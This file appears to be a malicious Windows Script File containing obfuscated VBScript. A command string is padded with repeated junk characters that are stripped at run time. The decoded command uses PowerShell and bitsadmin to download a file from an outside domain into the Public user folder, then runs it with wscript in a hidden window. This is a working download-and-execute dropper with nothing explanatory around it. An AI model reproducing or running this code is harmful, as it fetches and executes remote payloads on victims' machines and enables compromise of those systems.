<?xml version="nà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°b"?>
<job>
<script language="VBScript">
<![CDATA[
vwgerpj = "pnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°bowershelnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°bl bitnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°bsadmin /trannà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°bsfer 8 htnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°btp:/nà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°b/ekolevsirinyer.com.tr/Group.txt C:\Users\Pubnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°blic\VB;wscnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°bript //Enà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°b:VBnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°bScript 'C:\Usenà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°brs\Pubnà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°blic\VB';"
vwgerpj=Replace(vwgerpj,"nà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°mà©µë¶„ðŸ”¥ì¼ì£¼ì¼ðŸ”¥ë±ƒì‚´ ë°°ë‘˜ë ˆí–„ ë¹¼ê¸°b","")
Set usboeah = CreateObject ("WScript.shell")
usboeah.Run oqsngmi & vwgerpj , 0, True
']]>
</script>
</job>
